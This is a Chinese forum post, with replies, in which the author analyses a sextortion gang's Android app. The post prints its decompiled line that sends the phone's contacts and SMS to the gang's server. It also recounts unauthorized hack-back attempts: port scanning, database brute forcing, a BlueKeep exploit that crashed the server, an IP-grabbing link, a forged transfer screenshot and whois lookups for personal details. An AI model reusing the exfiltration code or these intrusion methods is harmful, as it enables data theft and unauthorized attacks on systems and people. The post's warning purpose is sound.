程序员节特刊:我与裸聊勒索团伙的持久抗战

admin   ·   发表于 3个月前   ·   案情讨论

在正文开始之前,先祝各位网工、软工等与程序圈沾边的同志们程序员节快乐。希望各位可以继续与996抗争到底,同时给自己的心灵放个假。祝大家工作顺利、幸福美满。一G棒!


一、介绍


1.1、起因


北京时间2019年10月20日晚23点43分,我的徒弟发来了求助信息。




得知此事后,我先问清楚了原因:徒弟收到了某位“小姐姐”的Luo聊诱惑,由于夜深人静,欲火焚身,导致精虫上脑。事后这位“小姐姐”给徒弟发了一个app,说是会在此app里直播。于是徒弟下载安装了此app,并且填入了“小姐姐”发来的邀请码。几分钟过后,对方突然变脸,向徒弟发来了Luo聊的视频,和徒弟的手机通讯录,进行敲诈勒索。毫无疑问,徒弟是中了某种类木马程序,但是与远控又不完全相同。




于是我让徒弟把对方的联系方式和对方发的app。


1.2、APP逆向分析




如图标红位置是此APP的main class,所以我们直接对其进行代码审计即可。




如图标红位置是犯罪团伙接收信息的数据库连接地址,下面我把这一条代码po出来,大家就可以看懂它的工作机制啦。


paramrg_dshdhkl = rg_wbxl.rg_n3391(rg_anzhwlczl.rg_n13898
("http://" + "152.XX.XXX.124" + "/index/index/ajax", 1, 
"Code=" + String.valueOf(paramrg_dshdhkl.GetTextView().getText()) 
+ "&Model=" + Build.MODEL + "&Phone=" + "" + "&Address=" + str1 
+ "&Message=" + str2, null, null, true, null, 0, 5000, null));


  1. 变量1=后面的变量

  2. 数据库连接152.XX.XXX.124+目录/index/index/ajax

  3. Code类似于id,+string是获取后面的值(gettext)

  4. +model不懂是要干啥、+phone是获取手机号、+address是获取地址

  5. +message是获取信息

   

str1和str2是两个functions,用来获取手机通讯录信息的功能,下面我会把代码发出来。




这是获取通讯录的代码,大家可以看到content那里很像url,实际上是类似于连接了发信服务器。id和displayname分别是通讯录的id和通讯录的姓名。




这是获取通讯录短信的代码,分析这段代码我们可以参照sms结构。


sms主要结构:

  

  _id:短信序号,如100

  

  thread_id:对话的序号,如100

  

  address:发件人地址,即手机号

  

  person:发件人,如果发件人在通讯录中则为具体姓名,陌生人为null

  

  date:日期,long型

  

  protocol:协议0SMS_RPOTO短信,1MMS_PROTO彩信

  

  read:是否阅读0未读,1已读

  

  status:短信状态-1接收

  

  type:短信类型1是接收到的,2是已发出

  

  body:短信具体内容

  

  service_center:短信服务中心号码编号


1.3、尝试渗透


      我们已经知道了对方的数据库连接地址,那么我们就可以尝试一波渗透测试(黑了它)。




system error,由此可知对方并没有在根目录搭建web应用。




通过whatweb,依旧没有获取到什么有用信息。




通过nmap可以看到对方开启了3306和3389端口。由此可以推断此mysql数据库就是用来接收受害者信息的,3389很可能是远程桌面连接。首先数据库爆破失败了,原因是,此ip的服务商是ucloud,所以数据库登录名称应该是随机的,而不是root,这就增加了暴力破解的困难。随后测试了一波蓝屏0708,poc依旧没有通过。




正如我所说的一样,3389是用来远程连接的,于是我想到了另一个exp。




目测已经把对方服务器打蓝屏了。


二、抗战[上]


2.1、找到组织


徒弟和我说他找到了组织,这个群里面的人全部都是受害者,于是我让他把我拉了进去。




据不完全统计,平均每三个人,就有一个被勒索金额超过1000,目前最高涉案金额为8000。每天都会有新的受害者加群,可是又有多少受害者没有找到组织呢?这个基数我们无法猜测。


2.2、抗战策略


      首先,我让大家把对方的联系方式和相关的app发给我,我一边做逆向分析一边尝试社工。但很遗憾,广义社工对他们是起不到任何作用的,因为这些犯罪团伙们的QQ都是正规渠道买来的,你说气不气?而且大都是靓号。通过分析,我们得知对方是团伙作案,且分工明细。例如,发信息的只管发信息、管Luo聊诱惑的只管Luo聊诱惑、发app的只管发app、负责收费的只管负责收费。对方发来的收款码都是几分钟一更换。包括支付宝,银行卡也是。


2.3、主动攻击


      我和群里的某位不知名的凯先生,要来了一个QQ小号,用它来进行主动攻击。我加了数以十计的Luo聊“小姐姐”(实则为抠脚大汉、视频内容大部分为假视频,也有极少数是对方聘用的真人)。




我给他发了一个打ip的链接,只要他点开,我就可以获取他的ip,可是对方的反侦察能力很强,完全不管我在说什么。随后他发来了一个博彩app让我安装,于是我就拿出了安卓模拟器安装,哈哈,各种套路他。可最后还是失败了。不过没有关系,套路来了一张照片,我问了下群里的人,群里的人说没有见过。所以对方有可能发的是真人照。下面我会po出来,如果看了这篇文章的人发现认识这个人,并且这个人不是犯罪团伙的人,请及时联系我删除!!!!!。




我打了一个非常完美的马赛克。OK,换下一个思路。现在,我以委托人的身份,加对方,请求对方帮我黑掉别人的通讯录(由于对方把我删了,所有聊天记录不全,这里就不具体发了)。




他要我1000,于是我P了一个转账1000的图(因为我们知道他们负责骗人的和负责骗钱的是不同的人,所以利用这一点可以忽悠他们)。




于是对方发来了一张聊天记录的截图,是负责骗人的人和所谓的黑客的聊天截图。




这个头像的QQ应该就是这个人的大号了,可是我能力有限,没能忽悠来他的大号,并且由于群里的其他人加他,打草惊蛇,行动失败,我被删了。


三、抗战[下]


3.1、查ip


好的,通过钓鱼钓不来ip,没关系,我们直接查。具体的过程我不说了,因为此文章讨论的不是技术,而是事件。我通过wireshark的监听功能,尝试与对方语音通话,以此建立UDP协议,从而获取对方ip。下面是对方的ip地址。




精准度由半径几千米到几万米不等,以上数据已有群友提交给了当地网警。同时我们也在协助破案,争取早日把犯罪团伙一网打尽。


3.2、意外发现


在我逆向分析另一个app时,发现了一个链接,于是我赶紧打开了它。




应该是这个app的接口,但是我没有找到po数据的地方。不过这是一个url,不是ip,所以我们可以去whois反查一下信息。




得到了对方的注册姓名和手机邮箱。


四、总结


从一开始,我就强调,这是一场持久的战役,因为敌人在暗处,我们在明处。受害人绝对比我们想象中的要多,但也请各位管住自己的手不要做键盘侠,管住自己的嘴,不要做无脑喷。欲无罪,没偷没抢,没渣没外遇。但同时也提醒各位:色字头上一把刀,各位且行且珍惜。多和自己的女朋友交流、沟通,没有女朋友的同学抓紧时间找个女朋友。


从开始“查案”到现在,我一直是使用的手机热点,因为家里的wifi坏了,还没技术人员来修。“查案”的工作我会一直继续下去,希望各位朋友各界人士将此文章转发出去,提醒更多的人避免上当受骗!


文章原文在社长的微信公众号里,公众号名称:久哥叨叨。

没关注的关注一下,有稳定收入的打个赏,谢谢大家的支持!


4 Reply   |  Until 7天前 | 519 View

mmmmy
发表于 20天前

我也被威胁了能求助吗

评论列表

  • 加载数据中...

编写评论内容

admin
发表于 10天前

mmmmy

20天前

我也被威胁了能求助吗

亲,我加不上你的QQ啊,今天是哪一天?

评论列表

  • 加载数据中...

编写评论内容

ctpifoy
发表于 9天前

我可以求助么

评论列表

  • 加载数据中...

编写评论内容

hsjku
发表于 7天前

大佬,求助,被敲诈了7000,钱都是小事,主要咽不下这口气

评论列表

  • 加载数据中...

编写评论内容
LoginCan Publish Content